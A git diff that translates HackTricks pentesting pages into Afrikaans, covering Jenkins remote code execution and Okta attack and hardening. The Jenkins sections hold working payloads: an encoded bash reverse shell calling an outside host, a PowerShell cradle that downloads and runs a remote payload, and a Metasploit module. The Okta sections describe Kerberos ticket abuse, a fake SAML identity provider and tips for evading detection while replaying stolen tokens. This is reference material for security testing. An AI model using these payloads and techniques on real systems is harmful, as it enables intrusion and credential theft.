@@ -4,37 +4,33 @@ ## Creating a Project -This method is very noisy because you have to create a hole new project (obviously this will only work if you user is allowed to create a new project). +Hierdie metode is baie luidrugtig omdat jy 'n heel nuwe projek moet skep (duidelik sal dit net werk as jou gebruiker toegelaat word om 'n nuwe projek te skep). -1. **Create a new project** (Freestyle project) clicking "New Item" or in `/view/all/newJob` -2. Inside **Build** section set **Execute shell** and paste a powershell Empire launcher or a meterpreter powershell (can be obtained using _unicorn_). Start the payload with _PowerShell.exe_ instead using _powershell._ -3. Click **Build now** - 1. If **Build now** button doesn't appear, you can still go to **configure** --> **Build Triggers** --> `Build periodically` and set a cron of `* * * * *` - 2. Instead of using cron, you can use the config "**Trigger builds remotely**" where you just need to set a the api token name to trigger the job. Then go to your user profile and **generate an API token** (call this API token as you called the api token to trigger the job). Finally, trigger the job with: **`curl :@/job//build?token=`** +1. **Skep 'n nuwe projek** (Freestyle project) deur op "New Item" te klik of in `/view/all/newJob` +2. Binne die **Build** afdeling stel **Execute shell** in en plak 'n powershell Empire launcher of 'n meterpreter powershell (kan verkry word met _unicorn_). Begin die payload met _PowerShell.exe_ in plaas van _powershell._ +3. Klik op **Build now** +1. As die **Build now** knoppie nie verskyn nie, kan jy steeds na **configure** --> **Build Triggers** --> `Build periodically` gaan en 'n cron van `* * * * *` stel +2. In plaas van om cron te gebruik, kan jy die konfigurasie "**Trigger builds remotely**" gebruik waar jy net die api token naam moet stel om die taak te aktiveer. 
Gaan dan na jou gebruikersprofiel en **genereer 'n API token** (noem hierdie API token soos jy die api token genoem het om die taak te aktiveer). Laastens, aktiveer die taak met: **`curl :@/job//build?token=`** ![](<../../images/image (165).png>) ## Modifying a Project -Go to the projects and check **if you can configure any** of them (look for the "Configure button"): +Gaan na die projekte en kyk **of jy enige** daarvan kan konfigureer (soek na die "Configure button"): ![](<../../images/image (265).png>) -If you **cannot** see any **configuration** **button** then you **cannot** **configure** it probably (but check all projects as you might be able to configure some of them and not others). +As jy **nie** enige **konfigurasie** **knoppie** kan sien nie, dan kan jy waarskynlik **nie** dit **konfigureer** nie (maar kyk na al die projekte aangesien jy dalk sommige daarvan kan konfigureer en nie ander nie). -Or **try to access to the path** `/job//configure` or `/me/my-views/view/all/job//configure` \_\_ in each project (example: `/job/Project0/configure` or `/me/my-views/view/all/job/Project0/configure`). +Of **probeer om toegang te verkry tot die pad** `/job//configure` of `/me/my-views/view/all/job//configure` \_\_ in elke projek (voorbeeld: `/job/Project0/configure` of `/me/my-views/view/all/job/Project0/configure`). ## Execution -If you are allowed to configure the project you can **make it execute commands when a build is successful**: +As jy toegelaat word om die projek te konfigureer, kan jy **maak dat dit opdragte uitvoer wanneer 'n bou suksesvol is**: ![](<../../images/image (98).png>) -Click on **Save** and **build** the project and your **command will be executed**.\ -If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**. 
+Klik op **Save** en **bou** die projek en jou **opdrag sal uitgevoer word**.\ +As jy nie 'n reverse shell uitvoer nie, maar 'n eenvoudige opdrag, kan jy **die uitvoer van die opdrag binne die uitvoer van die bou sien**. {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md index 33821cc03..5b9747e7d 100644 --- a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md +++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md @@ -1,27 +1,24 @@ -# Jenkins RCE with Groovy Script +# Jenkins RCE met Groovy Skrip {{#include ../../banners/hacktricks-training.md}} -## Jenkins RCE with Groovy Script +## Jenkins RCE met Groovy Skrip -This is less noisy than creating a new project in Jenkins - -1. Go to _path_jenkins/script_ -2. Inside the text box introduce the script +Dit is minder luidrugtig as om 'n nuwe projek in Jenkins te skep +1. Gaan na _path_jenkins/script_ +2. Binne die tekskas stel die skrip voor ```python def process = "PowerShell.exe ".execute() println "Found text ${process.text}" ``` +U kan 'n opdrag uitvoer met: `cmd.exe /c dir` -You could execute a command using: `cmd.exe /c dir` +In **linux** kan jy doen: **`"ls /".execute().text`** -In **linux** you can do: **`"ls /".execute().text`** - -If you need to use _quotes_ and _single quotes_ inside the text. You can use _"""PAYLOAD"""_ (triple double quotes) to execute the payload. - -**Another useful groovy script** is (replace \[INSERT COMMAND]): +As jy _aanhalings_ en _enkele aanhalings_ binne die teks moet gebruik. Jy kan _"""PAYLOAD"""_ (drie dubbele aanhalings) gebruik om die payload uit te voer. +**Nog 'n nuttige groovy script** is (vervang \[INSERT COMMAND]): ```python def sout = new StringBuffer(), serr = new StringBuffer() def proc = '[INSERT COMMAND]'.execute() 
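Review bot: in the jenkins-rce-with-groovy-script.md hunk at `@@ -1,27`, "Binne die tekskas stel die skrip voor" mistranslates "introduce the script": "stel voor" means to propose, or to introduce a person, so the step should read "voer die skrip in die tekskas in". The same hunk switches register from "jy" to "U kan 'n opdrag uitvoer met" one line later; keep "jy" as the rest of the patch does. While this block is being touched: the fences around `def process = "PowerShell.exe ".execute()` and the `[INSERT COMMAND]` snippet are tagged `python` on both sides of the diff although the code is Groovy; tagging them `groovy` would give correct highlighting.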
@@ -29,9 +26,7 @@ proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(1000) println "out> $sout err> $serr" ``` - -### Reverse shell in linux - +### Omgekeerde skulp in linux ```python def sout = new StringBuffer(), serr = new StringBuffer() def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute() @@ -39,29 +34,20 @@ proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(1000) println "out> $sout err> $serr" ``` - ### Reverse shell in windows -You can prepare a HTTP server with a PS reverse shell and use Jeking to download and execute it: - +Jy kan 'n HTTP-bediener met 'n PS reverse shell voorberei en Jeking gebruik om dit af te laai en uit te voer: ```python scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')" echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0 cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc ``` - ### Script -You can automate this process with [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py). - -You can use MSF to get a reverse shell: +Jy kan hierdie proses outomatiseer met [**hierdie skrip**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py). +Jy kan MSF gebruik om 'n omgekeerde shell te kry: ``` msf> use exploit/multi/http/jenkins_script_console ``` - {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/okta-security/README.md b/src/pentesting-ci-cd/okta-security/README.md index e682996c2..6a52b1520 100644 --- a/src/pentesting-ci-cd/okta-security/README.md +++ b/src/pentesting-ci-cd/okta-security/README.md 
@@ -4,60 +4,60 @@ ## Basic Information -[Okta, Inc.](https://www.okta.com/) is recognized in the identity and access management sector for its cloud-based software solutions. These solutions are designed to streamline and secure user authentication across various modern applications. They cater not only to companies aiming to safeguard their sensitive data but also to developers interested in integrating identity controls into applications, web services, and devices. +[Okta, Inc.](https://www.okta.com/) word erken in die identiteit en toegang bestuur sektor vir sy wolk-gebaseerde sagteware oplossings. Hierdie oplossings is ontwerp om gebruikersverifikasie oor verskeie moderne toepassings te stroomlyn en te beveilig. Hulle is nie net gerig op maatskappye wat hul sensitiewe data wil beskerm nie, maar ook op ontwikkelaars wat belangstel om identiteitsbeheer in toepassings, webdienste en toestelle te integreer. -The flagship offering from Okta is the **Okta Identity Cloud**. This platform encompasses a suite of products, including but not limited to: +Die vlaggies aanbod van Okta is die **Okta Identity Cloud**. Hierdie platform sluit 'n suite van produkte in, insluitend maar nie beperk tot nie: -- **Single Sign-On (SSO)**: Simplifies user access by allowing one set of login credentials across multiple applications. -- **Multi-Factor Authentication (MFA)**: Enhances security by requiring multiple forms of verification. -- **Lifecycle Management**: Automates user account creation, update, and deactivation processes. -- **Universal Directory**: Enables centralized management of users, groups, and devices. -- **API Access Management**: Secures and manages access to APIs. +- **Single Sign-On (SSO)**: Vereenvoudig gebruikers toegang deur een stel aanmeldbesonderhede oor verskeie toepassings toe te laat. +- **Multi-Factor Authentication (MFA)**: Versterk sekuriteit deur verskeie vorme van verifikasie te vereis. 
+- **Lifecycle Management**: Automatiseer die skepping, opdatering en deaktivering van gebruikersrekeninge. +- **Universal Directory**: Maak sentrale bestuur van gebruikers, groepe en toestelle moontlik. +- **API Access Management**: Beveilig en bestuur toegang tot API's. -These services collectively aim to fortify data protection and streamline user access, enhancing both security and convenience. The versatility of Okta's solutions makes them a popular choice across various industries, beneficial to large enterprises, small companies, and individual developers alike. As of the last update in September 2021, Okta is acknowledged as a prominent entity in the Identity and Access Management (IAM) arena. +Hierdie dienste het as doel om dataprotectie te versterk en gebruikers toegang te stroomlyn, wat beide sekuriteit en gerief verbeter. Die veelsydigheid van Okta se oplossings maak dit 'n gewilde keuse oor verskeie industrieĂ«, voordelig vir groot ondernemings, klein maatskappye en individuele ontwikkelaars. Soos van die laaste opdatering in September 2021, word Okta erken as 'n prominente entiteit in die Identiteit en Toegang Bestuur (IAM) arena. > [!CAUTION] -> The main gola of Okta is to configure access to different users and groups to external applications. If you manage to **compromise administrator privileges in an Oktas** environment, you will highly probably able to **compromise all the other platforms the company is using**. +> Die hoofdoel van Okta is om toegang tot verskillende gebruikers en groepe tot eksterne toepassings te konfigureer. As jy daarin slaag om **administrateur regte in 'n Okta** omgewing te **kompromitteer**, sal jy hoogs waarskynlik in staat wees om **alle ander platforms wat die maatskappy gebruik te kompromitteer**. > [!TIP] -> To perform a security review of an Okta environment you should ask for **administrator read-only access**. 
+> Om 'n sekuriteitsherziening van 'n Okta omgewing uit te voer, moet jy vra vir **administrateur lees-slegs toegang**. ### Summary -There are **users** (which can be **stored in Okta,** logged from configured **Identity Providers** or authenticated via **Active Directory** or LDAP).\ -These users can be inside **groups**.\ -There are also **authenticators**: different options to authenticate like password, and several 2FA like WebAuthn, email, phone, okta verify (they could be enabled or disabled)... +Daar is **gebruikers** (wat kan wees **gestoor in Okta,** ingelogde van geconfigureerde **Identiteitsverskaffers** of geverifieer via **Active Directory** of LDAP).\ +Hierdie gebruikers kan binne **groepe** wees.\ +Daar is ook **verifikators**: verskillende opsies om te verifieer soos wagwoord, en verskeie 2FA soos WebAuthn, e-pos, telefoon, okta verify (hulle kan geaktiveer of gedeaktiveer wees)... -Then, there are **applications** synchronized with Okta. Each applications will have some **mapping with Okta** to share information (such as email addresses, first names...). Moreover, each application must be inside an **Authentication Policy**, which indicates the **needed authenticators** for a user to **access** the application. +Dan is daar **toepassings** wat met Okta gesinkroniseer is. Elke toepassing sal 'n paar **kaarte met Okta** hĂȘ om inligting te deel (soos e-pos adresse, voorname...). Boonop moet elke toepassing binne 'n **Verifikasiebeleid** wees, wat die **nodige verifikators** aandui vir 'n gebruiker om die toepassing te **benader**. > [!CAUTION] -> The most powerful role is **Super Administrator**. +> Die mees kragtige rol is **Super Administrator**. > -> If an attacker compromise Okta with Administrator access, all the **apps trusting Okta** will be highly probably **compromised**. +> As 'n aanvaller Okta met Administrateur toegang kompromitteer, sal al die **toepassings wat Okta vertrou** hoogs waarskynlik **gekompromitteer** wees. 
## Attacks ### Locating Okta Portal -Usually the portal of a company will be located in **companyname.okta.com**. If not, try simple **variations** of **companyname.** If you cannot find it, it's also possible that the organization has a **CNAME** record like **`okta.companyname.com`** pointing to the **Okta portal**. +Gewoonlik sal die portaal van 'n maatskappy geleĂ« wees in **companyname.okta.com**. As dit nie so is nie, probeer eenvoudige **variaties** van **companyname.** As jy dit nie kan vind nie, is dit ook moontlik dat die organisasie 'n **CNAME** rekord het soos **`okta.companyname.com`** wat na die **Okta portaal** wys. ### Login in Okta via Kerberos -If **`companyname.kerberos.okta.com`** is active, **Kerberos is used for Okta access**, typically bypassing **MFA** for **Windows** users. To find Kerberos-authenticated Okta users in AD, run **`getST.py`** with **appropriate parameters**. Upon obtaining an **AD user ticket**, **inject** it into a controlled host using tools like Rubeus or Mimikatz, ensuring **`clientname.kerberos.okta.com` is in the Internet Options "Intranet" zone**. Accessing a specific URL should return a JSON "OK" response, indicating Kerberos ticket acceptance, and granting access to the Okta dashboard. +As **`companyname.kerberos.okta.com`** aktief is, **word Kerberos gebruik vir Okta toegang**, wat tipies **MFA** vir **Windows** gebruikers omseil. Om Kerberos-geverifieerde Okta gebruikers in AD te vind, voer **`getST.py`** uit met **geskikte parameters**. Nadat jy 'n **AD gebruikerskaart** verkry het, **injekteer** dit in 'n beheerde gasheer met behulp van gereedskap soos Rubeus of Mimikatz, en verseker dat **`clientname.kerberos.okta.com` in die Internet Opsies "Intranet" sone is**. Toegang tot 'n spesifieke URL moet 'n JSON "OK" antwoord teruggee, wat die aanvaarding van die Kerberos kaart aandui, en toegang tot die Okta dashboard verleen. 
-Compromising the **Okta service account with the delegation SPN enables a Silver Ticket attack.** However, Okta's use of **AES** for ticket encryption requires possessing the AES key or plaintext password. Use **`ticketer.py` to generate a ticket for the victim user** and deliver it via the browser to authenticate with Okta. +Die kompromitering van die **Okta diensrekening met die delegasie SPN stel 'n Silver Ticket aanval in staat.** egter, Okta se gebruik van **AES** vir kaartversleuteling vereis dat die AES-sleutel of platte wagwoord besit word. Gebruik **`ticketer.py` om 'n kaart vir die slagoffer gebruiker te genereer** en lewer dit via die blaaiert om met Okta te verifieer. **Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.** ### Hijacking Okta AD Agent -This technique involves **accessing the Okta AD Agent on a server**, which **syncs users and handles authentication**. By examining and decrypting configurations in **`OktaAgentService.exe.config`**, notably the AgentToken using **DPAPI**, an attacker can potentially **intercept and manipulate authentication data**. This allows not only **monitoring** and **capturing user credentials** in plaintext during the Okta authentication process but also **responding to authentication attempts**, thereby enabling unauthorized access or providing universal authentication through Okta (akin to a 'skeleton key'). +Hierdie tegniek behels **toegang tot die Okta AD Agent op 'n bediener**, wat **gebruikers sinkroniseer en verifikasie hanteer**. Deur konfigurasies in **`OktaAgentService.exe.config`** te ondersoek en te ontsleutel, veral die AgentToken met behulp van **DPAPI**, kan 'n aanvaller potensieel **verifikasiedata onderskep en manipuleer**. 
Dit stel nie net in staat om **te monitor** en **gebruikers se akrediteer in platte teks** tydens die Okta verifikasie proses nie, maar ook om **te reageer op verifikasie pogings**, wat ongeoorloofde toegang moontlik maak of universele verifikasie deur Okta bied (soos 'n 'skelet sleutel'). **Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.** ### Hijacking AD As an Admin -This technique involves hijacking an Okta AD Agent by first obtaining an OAuth Code, then requesting an API token. The token is associated with an AD domain, and a **connector is named to establish a fake AD agent**. Initialization allows the agent to **process authentication attempts**, capturing credentials via the Okta API. Automation tools are available to streamline this process, offering a seamless method to intercept and handle authentication data within the Okta environment. +Hierdie tegniek behels die kaping van 'n Okta AD Agent deur eers 'n OAuth Code te verkry, en dan 'n API-token aan te vra. Die token is geassosieer met 'n AD domein, en 'n **connector word genoem om 'n vals AD agent te vestig**. Inisialiserings laat die agent toe om **verifikasie pogings te verwerk**, wat akrediteer via die Okta API vasvang. Outomatiseringsgereedskap is beskikbaar om hierdie proses te stroomlyn, wat 'n naatlose metode bied om verifikasiedata binne die Okta omgewing te onderskep en te hanteer. **Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.** 
@@ -65,42 +65,42 @@ This technique involves hijacking an Okta AD Agent by first obtaining an OAuth C **Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.** -The technique involves **deploying a fake SAML provider**. By integrating an external Identity Provider (IdP) within Okta's framework using a privileged account, attackers can **control the IdP, approving any authentication request at will**. The process entails setting up a SAML 2.0 IdP in Okta, manipulating the IdP Single Sign-On URL for redirection via local hosts file, generating a self-signed certificate, and configuring Okta settings to match against the username or email. Successfully executing these steps allows for authentication as any Okta user, bypassing the need for individual user credentials, significantly elevating access control in a potentially unnoticed manner. +Die tegniek behels **die ontplooiing van 'n vals SAML verskaffer**. Deur 'n eksterne Identiteitsverskaffer (IdP) binne Okta se raamwerk te integreer met 'n bevoorregte rekening, kan aanvallers **die IdP beheer, enige verifikasie versoek na willekeur goedkeur**. Die proses behels die opstelling van 'n SAML 2.0 IdP in Okta, die manipulasie van die IdP Single Sign-On URL vir omleiding via die plaaslike gashere lĂȘer, die generering van 'n self-ondertekende sertifikaat, en die konfigurasie van Okta instellings om teen die gebruikersnaam of e-pos te pas. Die suksesvolle uitvoering van hierdie stappe maak verifikasie as enige Okta gebruiker moontlik, wat die behoefte aan individuele gebruikers akrediteer omseil, wat toegangbeheer in 'n potensieel onopgemerkte manier aansienlik verhoog. ### Phishing Okta Portal with Evilgnix -In [**this blog post**](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) is explained how to prepare a phishing campaign against an Okta portal. 
+In [**this blog post**](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) word verduidelik hoe om 'n phishing veldtog teen 'n Okta portaal voor te berei. ### Colleague Impersonation Attack -The **attributes that each user can have and modify** (like email or first name) can be configured in Okta. If an **application** is **trusting** as ID an **attribute** that the user can **modify**, he will be able to **impersonate other users in that platform**. +Die **kenmerke wat elke gebruiker kan hĂȘ en wysig** (soos e-pos of voornaam) kan in Okta geconfigureer word. As 'n **toepassing** **vertrou** as ID 'n **kenmerk** wat die gebruiker kan **wysig**, sal hy in staat wees om **ander gebruikers in daardie platform na te doen**. -Therefore, if the app is trusting the field **`userName`**, you probably won't be able to change it (because you usually cannot change that field), but if it's trusting for example **`primaryEmail`** you might be able to **change it to a colleagues email address** and impersonate it (you will need to have access to the email and accept the change). +Daarom, as die app die veld **`userName`** vertrou, sal jy waarskynlik nie in staat wees om dit te verander nie (omdat jy gewoonlik nie daardie veld kan verander nie), maar as dit vertrou byvoorbeeld **`primaryEmail`** kan jy dalk **dit na 'n kollega se e-pos adres verander** en dit na doen (jy sal toegang tot die e-pos moet hĂȘ en die verandering moet aanvaar). -Note that this impersoantion depends on how each application was condigured. Only the ones trusting the field you modified and accepting updates will be compromised.\ -Therefore, the app should have this field enabled if it exists: +Let daarop dat hierdie nabootsing afhang van hoe elke toepassing geconfigureer is. Slegs diegene wat die veld wat jy gewysig het vertrou en opdaterings aanvaar, sal gekompromitteer word.\ +Daarom moet die app hierdie veld geaktiveer hĂȘ as dit bestaan:
-I have also seen other apps that were vulnerable but didn't have that field in the Okta settings (at the end different apps are configured differently). +Ek het ook ander toepassings gesien wat kwesbaar was maar nie daardie veld in die Okta instellings gehad het nie (aan die einde is verskillende toepassings anders geconfigureer). -The best way to find out if you could impersonate anyone on each app would be to try it! +Die beste manier om uit te vind of jy iemand op elke app kan naboots, sal wees om dit te probeer! ## Evading behavioural detection policies -Behavioral detection policies in Okta might be unknown until encountered, but **bypassing** them can be achieved by **targeting Okta applications directly**, avoiding the main Okta dashboard. With an **Okta access token**, replay the token at the **application-specific Okta URL** instead of the main login page. +Gedragsdeteksiebeleide in Okta mag onbekend wees totdat dit teëgekom word, maar **omseiling** daarvan kan bereik word deur **Okta toepassings direk te teiken**, wat die hoof Okta dashboard vermy. Met 'n **Okta toegangstoken**, herhaal die token by die **toepassing-spesifieke Okta URL** in plaas van die hoof aanmeldblad. -Key recommendations include: +Belangrike aanbevelings sluit in: -- **Avoid using** popular anonymizer proxies and VPN services when replaying captured access tokens. -- Ensure **consistent user-agent strings** between the client and replayed access tokens. -- **Refrain from replaying** tokens from different users from the same IP address. -- Exercise caution when replaying tokens against the Okta dashboard. -- If aware of the victim company's IP addresses, **restrict traffic** to those IPs or their range, blocking all other traffic. +- **Vermy die gebruik van** gewilde anonymiseringsproxies en VPN-dienste wanneer jy vasgevange toegangstokens herhaal. +- Verseker **konstante gebruikers-agent strings** tussen die kliënt en herhaalde toegangstokens. 
+- **Wees versigtig om tokens** van verskillende gebruikers vanaf dieselfde IP-adres te herhaal. +- Wees versigtig wanneer jy tokens teen die Okta dashboard herhaal. +- As jy bewus is van die slagoffer maatskappy se IP-adresse, **beperk verkeer** na daardie IP's of hul reeks, en blokkeer alle ander verkeer. ## Okta Hardening -Okta has a lot of possible configurations, in this page you will find how to review them so they are as secure as possible: +Okta het baie moontlike konfigurasies, op hierdie bladsy sal jy vind hoe om dit te hersien sodat dit so veilig as moontlik is: {{#ref}} okta-hardening.md @@ -112,7 +112,3 @@ okta-hardening.md - [https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/okta-security/okta-hardening.md b/src/pentesting-ci-cd/okta-security/okta-hardening.md index a7dac96a7..5ca5a88f5 100644 --- a/src/pentesting-ci-cd/okta-security/okta-hardening.md +++ b/src/pentesting-ci-cd/okta-security/okta-hardening.md 
@@ -6,72 +6,72 @@ ### People -From an attackers perspective, this is super interesting as you will be able to see **all the users registered**, their **email** addresses, the **groups** they are part of, **profiles** and even **devices** (mobiles along with their OSs). +Vanuit 'n aanvaller se perspektief is dit baie interessant omdat jy **alle geregistreerde gebruikers** kan sien, hul **e-pos** adresse, die **groepe** waarvan hulle deel is, **profiele** en selfs **toestelle** (mobiele saam met hul OS's). -For a whitebox review check that there aren't several "**Pending user action**" and "**Password reset**". +Vir 'n whitebox hersiening, kyk dat daar nie verskeie "**Wagtende gebruiker aksie**" en "**Wagwoord herstel**" is nie. ### Groups -This is where you find all the created groups in Okta. it's interesting to understand the different groups (set of **permissions**) that could be granted to **users**.\ -It's possible to see the **people included inside groups** and **apps assigned** to each group. +Hier vind jy al die geskepte groepe in Okta. Dit is interessant om die verskillende groepe (stel van **toestemmings**) te verstaan wat aan **gebruikers** toegeken kan word.\ +Dit is moontlik om die **mense ingesluit in groepe** en **apps toegeken** aan elke groep te sien. -Ofc, any group with the name of **admin** is interesting, specially the group **Global Administrators,** check the members to learn who are the most privileged members. +Natuurlik is enige groep met die naam **admin** interessant, veral die groep **Global Administrators,** kyk na die lede om te leer wie die mees bevoorregte lede is. -From a whitebox review, there **shouldn't be more than 5 global admins** (better if there are only 2 or 3). +Vanuit 'n whitebox hersiening, daar **moet nie meer as 5 globale admins wees nie** (beter as daar net 2 of 3 is). ### Devices -Find here a **list of all the devices** of all the users. You can also see if it's being **actively managed** or not. 
+Vind hier 'n **lys van al die toestelle** van al die gebruikers. Jy kan ook sien of dit **aktief bestuur** word of nie. ### Profile Editor -Here is possible to observe how key information such as first names, last names, emails, usernames... are shared between Okta and other applications. This is interesting because if a user can **modify in Okta a field** (such as his name or email) that then is used by an **external application** to **identify** the user, an insider could try to **take over other accounts**. +Hier is dit moontlik om te observeer hoe sleutel-inligting soos voorname, vanname, e-pos, gebruikersname... tussen Okta en ander toepassings gedeel word. Dit is interessant omdat as 'n gebruiker **'n veld in Okta kan wysig** (soos sy naam of e-pos) wat dan deur 'n **eksterne toepassing** gebruik word om die gebruiker te **identifiseer**, kan 'n insider probeer om **ander rekeninge oor te neem**. -Moreover, in the profile **`User (default)`** from Okta you can see **which fields** each **user** has and which ones are **writable** by users. If you cannot see the admin panel, just go to **update your profile** information and you will see which fields you can update (note that to update an email address you will need to verify it). +Boonop, in die profiel **`User (default)`** van Okta kan jy **watter velde** elke **gebruiker** het en watter een **skryfbaar** is deur gebruikers. As jy nie die admin paneel kan sien nie, gaan net na **opdateer jou profiel** inligting en jy sal sien watter velde jy kan opdateer (let daarop dat jy 'n e-pos adres moet verifieer om dit op te dateer). ### Directory Integrations -Directories allow you to import people from existing sources. I guess here you will see the users imported from other directories. +Gidsen laat jou toe om mense van bestaande bronne te importeer. Ek raai hier sal jy die gebruikers sien wat van ander gidse geïmporteer is. 
-I haven't seen it, but I guess this is interesting to find out **other directories that Okta is using to import users** so if you **compromise that directory** you could set some attributes values in the users created in Okta and **maybe compromise the Okta env**. +Ek het dit nie gesien nie, maar ek raai dit is interessant om uit te vind **ander gidse wat Okta gebruik om gebruikers te importeer** sodat as jy **daardie gids kompromitteer** kan jy sekere attribuutwaardes in die gebruikers geskep in Okta stel en **miskien die Okta omgewing kompromitteer**. ### Profile Sources -A profile source is an **application that acts as a source of truth** for user profile attributes. A user can only be sourced by a single application or directory at a time. +'n Profielbron is 'n **toepassing wat as 'n bron van waarheid** vir gebruikersprofielattribuut dien. 'n Gebruiker kan slegs deur 'n enkele toepassing of gids op 'n slag verkry word. -I haven't seen it, so any information about security and hacking regarding this option is appreciated. +Ek het dit nie gesien nie, so enige inligting oor sekuriteit en hacking rakende hierdie opsie word waardeer. ## Customizations ### Brands -Check in the **Domains** tab of this section the email addresses used to send emails and the custom domain inside Okta of the company (which you probably already know). +Kyk in die **Domeine** oortjie van hierdie afdeling die e-pos adresse wat gebruik word om e-posse te stuur en die pasgemaakte domein binne Okta van die maatskappy (wat jy waarskynlik al weet). -Moreover, in the **Setting** tab, if you are admin, you can "**Use a custom sign-out page**" and set a custom URL. +Boonop, in die **Instelling** oortjie, as jy admin is, kan jy "**Gebruik 'n pasgemaakte aftekenbladsy**" en 'n pasgemaakte URL stel. ### SMS -Nothing interesting here. +Niks interessant hier nie. ### End-User Dashboard -You can find here applications configured, but we will see the details of those later in a different section. 
+Jy kan hier toepassings vind wat geconfigureer is, maar ons sal die besonderhede van daardie later in 'n ander afdeling sien. ### Other -Interesting setting, but nothing super interesting from a security point of view. +Interessante instelling, maar niks super interessant vanuit 'n sekuriteitsoogpunt nie. ## Applications ### Applications -Here you can find all the **configured applications** and their details: Who has access to them, how is it configured (SAML, OPenID), URL to login, the mappings between Okta and the application... +Hier kan jy al die **geconfigureerde toepassings** en hul besonderhede vind: Wie toegang tot hulle het, hoe dit geconfigureer is (SAML, OPenID), URL om aan te meld, die mappings tussen Okta en die toepassing... -In the **`Sign On`** tab there is also a field called **`Password reveal`** that would allow a user to **reveal his password** when checking the application settings. To check the settings of an application from the User Panel, click the 3 dots: +In die **`Sign On`** oortjie is daar ook 'n veld genaamd **`Password reveal`** wat 'n gebruiker sou toelaat om sy **wagwoord te onthul** wanneer hy die toepassingsinstellings nagaan. Om die instellings van 'n toepassing vanaf die Gebruiker Paneel te kontroleer, klik op die 3 punte:
-And you could see some more details about the app (like the password reveal feature, if it's enabled): +En jy kan 'n paar meer besonderhede oor die app sien (soos die wagwoord onthul funksie, as dit geaktiveer is):
@@ -79,125 +79,121 @@ And you could see some more details about the app (like the password reveal feat ### Access Certifications -Use Access Certifications to create audit campaigns to review your users' access to resources periodically and approve or revoke access automatically when required. +Gebruik Toegang Sertifikasies om ouditveldtogte te skep om jou gebruikers se toegang tot hulpbronne periodiek te hersien en toegang outomaties goed te keur of te herroep wanneer nodig. -I haven't seen it used, but I guess that from a defensive point of view it's a nice feature. +Ek het dit nie gesien nie, maar ek raai dat dit vanuit 'n defensiewe perspektief 'n mooi funksie is. ## Security ### General -- **Security notification emails**: All should be enabled. -- **CAPTCHA integration**: It's recommended to set at least the invisible reCaptcha -- **Organization Security**: Everything can be enabled and activation emails shouldn't last long (7 days is ok) -- **User enumeration prevention**: Both should be enabled - - Note that User Enumeration Prevention doesn't take effect if either of the following conditions are allowed (See [User management](https://help.okta.com/oie/en-us/Content/Topics/users-groups-profiles/usgp-main.htm) for more information): - - Self-Service Registration - - JIT flows with email authentication -- **Okta ThreatInsight settings**: Log and enforce security based on threat level +- **Sekuriteits kennisgewing e-posse**: Alle moet geaktiveer wees. +- **CAPTCHA integrasie**: Dit word aanbeveel om ten minste die onsigbare reCaptcha in te stel. +- **Organisasie Sekuriteit**: Alles kan geaktiveer word en aktivering e-posse moet nie lank neem nie (7 dae is reg). +- **Gebruiker enumerasie voorkoming**: Albei moet geaktiveer wees. 
+- Let daarop dat Gebruiker Enumerasie Voorkoming nie in werking tree as enige van die volgende toestande toegelaat word nie (sien [Gebruiker bestuur](https://help.okta.com/oie/en-us/Content/Topics/users-groups-profiles/usgp-main.htm) vir meer inligting): +- Selfdiens Registrasie +- JIT vloei met e-pos verifikasie +- **Okta ThreatInsight instellings**: Log en handhaaf sekuriteit gebaseer op bedreigingsvlak. ### HealthInsight -Here is possible to find correctly and **dangerous** configured **settings**. +Hier is dit moontlik om korrek en **gevaarlike** geconfigureerde **instellings** te vind. ### Authenticators -Here you can find all the authentication methods that a user could use: Password, phone, email, code, WebAuthn... Clicking in the Password authenticator you can see the **password policy**. Check that it's strong. +Hier kan jy al die autentikasie metodes vind wat 'n gebruiker kan gebruik: Wagwoord, telefoon, e-pos, kode, WebAuthn... Klik op die Wagwoord autentiseerder en jy kan die **wagwoord beleid** sien. Kyk dat dit sterk is. -In the **Enrollment** tab you can see how the ones that are required or optinal: +In die **Registrasie** oortjie kan jy sien hoe diegene wat vereis of opsioneel is:
